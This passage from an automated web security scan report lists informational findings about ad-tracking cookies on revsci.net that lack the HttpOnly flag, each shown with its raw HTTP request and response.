Set-Cookie: rtc_52Lf=MLsv8SMucB5j5hAHsvmC/212VHiLIgT9sbGvQkQvAn6pCKQr++AMLTjMcTR3X9clWXr6/EHvlLxpLeBARJAuRdRj1F0WnxHvU4nMjmbEJkrytYgF9upXx0BmPmcWclj7GqnTqjCek60lbV4knro6q3gugsiw2A+bkb3nLGd8/i9FR9+5s2s5I4LZ0CvsNmZ8ZO3PF7AYfZXEAg9s8iNohu3nKPT8MU4EgeE7LkI1xlwspRSRJ6jHN51kB8VDsGE34CNx40G+MPuq56f7aNHKGI0zT0UQTEQ8fPcPW25D8jMKf5iUd4cUrIbfvsv9lxJtx35ggMRINRusKXfSJgHfdK/B8KnhQcKMkaRZPvwVwkEKW8hp4jxSmndOCs8UqxUe0lHcwIE4ocZ9LXgbkythtenPT2km2EYnjLwa1z1tsrUITPYDdgJQpGHyR/+jn7dJCD/L1zCkMBgUF1kQNKjQy+d+ZUiFR5TH5bmFJe9Q4TjxEiZN5TKjBKzFd1pMdrFRpMJWiSduF67sZywI2OlfMce9lg==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:21:16 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:21:15 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.126. http://pix04.revsci.net/E05510/b3/0/3/1003161/846854188.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05510/b3/0/3/1003161/846854188.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05510/b3/0/3/1003161/846854188.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26DM_EOM%3D1&C=E05510 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc816d2&20&10385,10387,10389,10395,10397,10402,10408,10406,10410,10412,10413,10419,10033,10336,10363,10424,10426,50033,50052,50000&4da2566e&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc8192a&0&&4da27787&00f8712b16a2747053422af6cef97d9a; rsiPus_0="MLtHr9MvsT9zJQH1Rjzvq4n0ZMEy4/DR9Gbiq+8IB5Fr6adEkwLc6i5z8KI/ee/1ZL+irruHcCQycTY5dM0pYXfqIbSfqXndCa6sLsYSD1+i/ByjHu3f8ZFwFyoByAKMs5nbJxgDfN80CaR7DLKKNHPDqSbcPEPuekVDnpipJNxfDmDOsXbvxORj+L+Da+znJZSMYWwIB2Jxj1OjZ7+c7nWqQQsEzt1nqHcyCEJtXNE3dgjOwAmET212C2QzlEkSbftEPYWS4GFSqo56H8r5JIbbe8AYfmAX9kJnLYaqCGWUC3h+XEKuD0EFIVI="; rsi_us_1000000=pUP1JU+j/wMU1E0vl4/J6zrPsVJPDYgHCU8fsTBuluz5+S3eA7ULCcbRjLsDxQ0XhQJGfpsqxs5N0PETdyHg4VBkVdp6Gl6hsTKoCFLeJxXiTezu+04jKq2slyRVFzPhwZBzfO1d1zmUTd8yIAbceGlapvPADl9T4MKg/sUEk0mjyvuJ1ghqgbYz6Ui1AWSrCnWvoWN75YlK62L+jLLWzJuNWXwluA4Yq7dlKNXCmJtpjmApatavjZjww1LyMGWTJ4VO/H8KS0LTmv4VNtBT0LWE1/8jL/0TOx4t6oCGj3ztgwlE7Jh6QDqVyScOs0EZvvf4qeAEp8TcMk27jCKfGjAqLGmlOG6iRV6GSraN+IHmXmX9PziRRx8pqDnBjc9ElU6ZsnoqYjQtOnIbtSU55e2zVVHeHSdmz4GTCkJ/a2O3q/5rhuDwqkBx569cjdP2eZM93P7t/T0z4uICk3paDWBedWfYWiveE6H3lzQ/p3+2WF/Xnjfdwc5kHSTV0WPJV1LsemYKpfu9yJxKjdopPK5HY+xCAV+/PoJ+ISzGUpwxXHb530wWA818zYtP3nkqF1Ct/2rff3MEnenaThym1LQpMqVgtvnB1c7aMNiSDs12ogA+FAbyhIGVOayrFMnIqb9BEwBJIZRHZ1k2gJf21izZNZt2b4b1i23gCvYPgfJk7pSE/pei5Vy6/1/2ipUKv+idq6GTLgISKOAsKJ4o1LEhTdI=; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X50BYKwAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKHoXvpuIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmSy+4mu22o+sIcAigrxYBwOnFIdqzXCCrXdEH3+Olb6OSMFWO3iaX3U4x5KBzJgVrlnfnda6j4PUOH9nRQH1zMW+U6fez+VR7HE77ryC//hTjJ9arzeRlwEtNZ8eyhqa74y+foiLcHccvHcuKOY4HS8NlCCyWynzGxeqDXQJiphQixt6RW96x2wQpuVAUxG0tWc8tjkgLyIGx1Ue+AtmZhdCgwsZEZA==; rtc_KY6k=MLsv8SMucB5j5hAHsvmC/212VHiLIgT9sbGvQkQvAn6pCKQr++AMLTjMcTR3X9clWXr6/EHvlLxpLeBARJAuRdRj1F0WnxHvU4nMjmbEJkrytYgF9upXx0BmPmcWclj7GqnTqjCek60lbV4knro6q3gugsiw2A+bkb3nLGd8/i9FR9+5s2s5I4LZ0CvsNmZ8ZO3PF7AYfZXEAg9s8iNohu3nKPT8MU4EgeE7LkI1xlwspRSRJ6jHN51kB8VDsGE34CNx40G+MPuq56f7aNHKGI0zT0UQTEQ8fPcPW25D8jMKf5iUd4cUrIbfvsv9lxJtx35ggMRINRusKXfSJgHfdK/B8KnhQcKMkaRZPvwVwkEKW8hp4jxSmndOCs8UqxUe0lHcwIE4ocZ9LXgbkythtenPT2km2EYnjLwa1z1tsrUITPYDdgJQpGHyR/+jn7dJCD/L1zCkMBgUF1kQNKjQy+d+ZUiFR5TH5bmFJe9Q4TjxEiZN5TKjBKzFd1pMdrFRpMJWiSduF67sZywI2OlfMce9lg==; udm_0=MLvv9SUJaSpr557EdtIXqfE3HSBwPslkZwvSPcK5G2swwjyHqQ3cxWOjDfyeIe8piuus7NCcw2bXAGlsdETPkq36I/Y42AJDYs9LsElwk1ke5DjqsTUwXJGkrVMMf9nB+bFWzbqFt46th5h6SNJ0Kpjernk8hlyHpHgv2r37LaSp7gSzfmYI/riLLNRYLRmFv9vbjuEsRV4gkAgtfeskOSu9BFF3QRF5fuvBfRka5Lu8FPLe07fE+o4YC4mUaxop7MNdMV53Fh5IISMnSmkL9iFQpZi4iWVyaL2XYkppgPSiQ5X4Gbs44qyab5mX1qBObgP5ud3WbvXeB/MmK1KCgnj2xpe3QB9gTCrV5OZC9TpgXSrtL13LUPj0B2xQ+jY8oWMOgqMMVXcofoXKIfv4RQK6Ue02i8EE/F+WmadMdZtXbwz260b423Rnn0H63PKg71SLI3hpljO8FNkGwBNAzpUY+ay9lrb/lR3AhulkHXcy7Y/FllspQpWzVatzlk54T84xesdZ4NhUATCjJQZxYS6KzN64wa1scWCtu393CB5+H2hUHBa5Z+AGcy7AEbQIcV5XeGRGO9clTz6RqYJ17KLwC5NL3KBK71a1jpqThQYxi/ptTdR1yEHu/bFF9hVsI77B0aHm8uHbkmXCt1fLsk029JkoeXaiKu0+7uvNiZk4Ykged+RurlcUR4YrfdHGzTuaBCRCl5j1LFK5c2CJrLAOA+SriPRZvrm1dHkoDgbG5T4zve3gsMD/997VEIfs6SZXBrEoAkGjEeaiT5g1NjqKg5/EbBz3DJq37CmYc62rxpw/SRH9dmZJRhbz6rV9xuFz2y0NlqKbCoaU+xdnaODJ0OS1dz9dJ4lH3IsTvVVjNEmD6tju4W8zuw8zi33ip+V+nJRTgcCQa3eHzRzQz6K6H4MXPV6LAqO3QYRvkEOYH9PAagwaCgdKpZPpgur1P/4M8UOK4ugnGaO7VtwozXmZq3XVNUhwoO19k77iwbMeDNzCridVGAJ4iO6g870g7BFqk9xppdM4j1ZZjfcnrjswWFauD8iVAwTKwQgH1+iNfj+e6AdSVFZHFH/qCWo9vCy0SyqMMBzhr9qJkV7LiGb2KeCnPMA0WrVxTzLID5jPqc6Qc16eXmqfmp5KjPyq41bHv+QOYyVDUlSV9z/1NrwfvQ1vhoigdB1YHBb/sA0uqppwb0nLrg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_KY6k=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50OBL3IQT7uItGE2X52BegxWE6TaYgYB7RnoMcJSvrO+9OLE5ntqFncA2iMgLzp6KRZ8pLE744Tm93MOZ7zFHcbP2P2np4Hjp7CivkjLdnBnw6DcfOutzdt7dZ9yY9qoV66z93VI0+JHf9oWZ5Qlv+bSpDw+by8Y2t6go+HjVgBnzk+UJ8ECB1XwYKk/SbXieYz8CCbKtClSvayedpthQ/j20IA40/U2LL7mbh43eQgaHdiTyety9QXwvwy4cMtQ9sURG8lVb4HTQq4Dtybd0btbP9FBmlQD9DKYvfniu4Ax0XQFDB8YO886o4enJYP+hdCgexJEYw==; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:31:15 GMT; Path=/
Set-Cookie: rtc_qMxP=MLsv8SNKcR5j5gKpOJPAaM1326Pgb/GNqsTY0NBa85tW2nZ+4HclLI+UJ2ITMNEFEk2HLmH0enhjxzNy9BxliOCugfHcmbJH8Y3cFWcEJkoClbAJNOpXzUZmzifpQzufoP1H7NCkzcTndfddq9oW/qCtqKNe0Q+bXJhy63+RiD8V9pIR02XA7ftd4gt6Fy7YvLatgI+ei0vAChIQd15DgUXLWoixpPVYawV3Flca8b/KKkAFs2NFpgIJTLcxOajJX0T+ISe1UmUP8t0onGfGZRmuQqQRfmW8IvIgl5n1QjVewSFnOZk2ZK27ZPm5RTddB76fAcjxcBRhviEHPY+rnFJE8Cm3PNYWZAEV2YQjpcu42oRWrwM0IAG4zYzzZCP0TJZD4jLuDf0W6jDbW7M2ff57dgeG7NNJiENw884u0XOx5v51YrEHXXGGpOceQzfmTGblCssqneFWbQLGeG7YskyHLS07dK4O+wfpTMwCihN0LcewWMQtbdn3qnEpDQi1zMltbwaPxz5w8Zqq2wPcL+aYaAN4+yE=; Domain=.revsci.net; Expires=Tue, 10-Apr-2012 17:31:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 17:31:14 GMT
Content-Length: 729

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs=['D08734_70852','E05510_10451'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.repl
...[SNIP]...
6.127. http://pix04.revsci.net/E05511/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /E05511/a4/0/0/pcx.js?csid=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; rtc_33wk=MLuBO6+ht4kWQAcYCwq3qvGtUKGrBZ8doDP9+JcCeOOzqVD+we0MdrEy1Q9wVOPnx3+D9JMtHr3sXfzNw3d1fHSsgQ0j1PMA3u0A65h1Zdx44dhHS5+AaIPoFOSkJCsUdawtp/+wPz4ovCW6/jlMSWl5gugGYoVzCFcXDgXPFV44jOFQ9OvWXmsv0TUYz+5nkUCtLLzUzXTh7M+zWyh9Os1EVo5VMh5rHTjjZnK71873pcHYYzezCHZTM/2+0SL4Kjk8dPShfwkCSnJWFkNsK0MzXgFnrllh6u548CifcAFwE1rm2D91a3IypBzg; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPNOUllLgIQVp2RxvqihGlAFSS4kHOeU66DJ0MOK5EzOCS2EByYfg7Qrqibp15G8KTrDuD6DAQkoQrdkdlzUiguejeRGfCSakzCoHZKm/jYrxQbkP1M3eZsdsuqc+uLh77lb/zkdFc3E54U2MEX2fHfbhfnLsMGeW5DWmK1KT64FYIE9CapbZj+AZ0UnNTmtUbpdxDL/rVbtchfPfF47acMHxbgs3BSVlWVsirz+chCnZgnJ1SCiD9YAA==; udm_0=MLv39SEJaSpn5l6paNmEREzM5uAjEsBEbZba7uQQIHoALYGisPLsFHhBzkvhsvoTAE9Wvh6ZCxNEguR8S2rPkq36I/Y42ALDUOFLsElUcIPk9fKtZgFPAifF96YUyd0oLw0n0Ryt05wdrN868QJ/+5QhhVDeoAuh30DL1Nhh9Cj6Z6bFYRSzXtL17j6Azv6OJ7vZk+tBc1rGGFfHZ8KvQqVAuPohuFqyL9DCTu4N0Gi+vRwD/rSPuL1I9buZQs2FTpssoPA2lbNTF5HywZMTMvEJzT0Zf2UCkxkv4eFl2m+vJ05v7cxXSZCytfEePc3AVcKePos/B6yGLnOnYNZSbct435ntIpmH+aMoQIO1EEBT/KbMs4hz185mDkHl9ZhQ39ljvZDokrGoTU36gJfTJZI/AqWc0s0Xmbv+pE9pw7ldj41i8wbXyTCypJvRY2Q6QpW/VxvJxSNMtuSsgJLL78oDV0r4PR7nI83zsUuOS3RTLGmoD3dqyR4OH4CVdFAjOC5c1c5gtOr1VVOjgkORQRxylxYzirxZwMyP6/DKD8ngoLSc1GRKtnJzMc/bI0l4AEBF/cQi4iDXo+iRxGlBQS15VZXhxq88Nq17eHWw9sEvQd1KJzj3TkOH5xiza3lfPjV8/CHorrK/+Knobbr3hxTR+CDzj6HH90GGT11M9it+1+QA5nWCEArmpXBdmF6CsdzcoC8OR+A2ZnIOw21PFvMOjPJ0Xl4ibJjWNuZLTuB1pifXet2MrhoPp1+fInzsdxtGeHmDvcCDU5EzIBOGhIw1ek72Dd+mmWJa7p78Egukc2SG4u/GfEFrBJvicafxIMcv0rhZ8jG4whpHITo1dongFFkobD4S8XLrx2FfETkMJiYku6qW2LdkVjWOWQhvIn8h6J78k9hHbKJ/8ZAg0J7tKUKeAUHjqFcYAEZH0H9DcwWmXwEcnQEbhb9TCWm/0ppaG1RDf1n+fu24/+jM7KvN/z7/7q0u56jH+YrYa3a+P1ge47W+os0pZiaDQpJH0htz1ZJ9klEG2dBtkl1cI3R0VAnabjV6XDJT9jTTZOg12FcQncz8373PU7Ej0JkBaKIJAHku50JX6LtJ/FgCiFkaBBhVLHZvlusvhSNrYDJHBvuC8L8qGa82X1lUTBV7rlrFEvpcBgBGilPpJasi; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOUnFLgIQV7mdYdLA2pc7YYCHwinKKAanZ4dp0pF1riTtzTEJ3YH2aKnvUGIZWEDBPcm1ODIeZsCvPIY7zEPvimq6xVR6C2raNjTLevnLzRGW6QFf6Yhb6PGsPk1+c9TuLw7uFuX0pTno91vWYq8r+jOHdTGOVVMxecxIAsgmxAWDiGibzfT77Zb9JXgwk7MvqhQNElIcyCgOANbrkFhxb4iOkSY8pHtiYCJ2dSkLqqKeeJ/f3w==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:29:28 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:29:28 GMT
Content-Length: 263

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['D08734_70006','D08734_72076','D08734_72077','D08734_72082'];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable(['D08734_7
...[SNIP]...
6.128. http://pix04.revsci.net/E05511/b3/0/3/0902121/10608952.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/10608952.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/10608952.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D408799%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252F%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=408799
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc2dfbd&0&&4d9d2f40&00f8712b16a2747053422af6cef97d9a; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc2dfda&0&&4d9c03eb&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; rtc_ZRdI=MLsvrFUucT5jJQFEjn4UCLtfKi1bT6XJF/Ke3QlsQpoZ1X9kRiPoMT0vPHni220BuefN4+w0QDxcRXN24I0Asr7xgdACqrHB0m67F9qXTgct2EN+vx1Kz2qgrSXHJMcW31u9PbAu1Q0puOakzdXHZVUaqKXKpvaRcVcKiXSTA7DL6lqA31DNueTJfahrhz8tvgH9JKtB0RUqAk7TLicfK1WfGaaOsREpwP9lBTpjNapbBi9c69Suxn4OypmFarcp5fNRqAbKRPRF8eHRNT4vvWr+PoZv2GyTjicCIP3umhIkB+xOAXxZrvclHRkbDsIsnwSNEAybZ0fF2IDRSpjtr3pDJ+ihxQDXHAbdwm6LbyN6IoNJ003+6/nA; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; rsi_segs_1000000=pUPNOU2FrwIQ1q3R0PbJo8GaVponY2jtSJcNJwOPRQb1v4U4HgcqewiMoo8UZf82yDpuxbUFPQiyIAbv/dFNHsZJ0JP83QhSdoQBExyJGwrIdoKnVwTHsilYaBBTtO3c/Y9R88f3EN1PkabXePPxNQuUgKNeALAAz0Dx0lLVJ9YS6Nq3NRopjwHgVY3uEFPbdsHx/ETyqXklDauCSWCUPlZ2E3h7UohRS3uUCODriDkzGVsL7KRXKu7Uo0D45uJbM1i9ig==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZRdI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOBLwIMVp8ceRM3WRl5l/8VdUUz9mYkDWlJfp5AoQ4NFluEUw2hr80cgj7G6Lq6eb2pifkgIl3hQFaWH4wAGfONd0AxNl9R4r24yg2IkXClwXqAex+KgbymzZmFm7jteB85NWCbzH30/LfD/5dGBfMl/lQilsQgCYbOhR/TOqs1CzTmsIjI86HM9xfM2aMyymX5pEXSTu39ZIZCVFV6SdsG3phwXxMrf4/AnE8sw4Fwp8TutlpkEIlytnRwbZJUkhE3TEfYC+97lBFbHn0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:01 GMT; Path=/
Set-Cookie: rtc_Xb0-=MLsv7tUvsW9npigQh+m6PS9pIDm9YCrv+PJNecGjhxSUI1bCZ8Ri9PlaJ0eYwhF0dD57GtlzTWSLIXg3Y98VhJqU2IQZmMvmGuG9Jx5GJCMAKT9/9DCsOSrrzmmNaIkcQa83G6V7noY9MwAXfdgQgHVd/8ZT6oL5hwebdaMLK/91t2b/aRBabBZSk3tfHbOX1PK+XO36gnb2K3GZDddDK0R7j3WozV2g0OuzMO7KRVs5DYCIxULFxn28fZG0HT8WlUPkgbCcFK+aNbesM2ofG2rjFFYrX15lLAWfw+XPAPKPbZ3vEr5hBiSTVq2UpdmEVM0jExfX+kj25CPQeNDSfQt7H06cIGryO9V8q9VcDuXXy3+aY5RHWklTcyvTVQz9kggexx1fvkeTIHKTZhc4z7U=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:01 GMT; Path=/
Set-Cookie: NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:01 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:00 GMT
Content-Length: 323

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'];
if(typeof(DM_onSegsAvailable)=="function")
...[SNIP]...
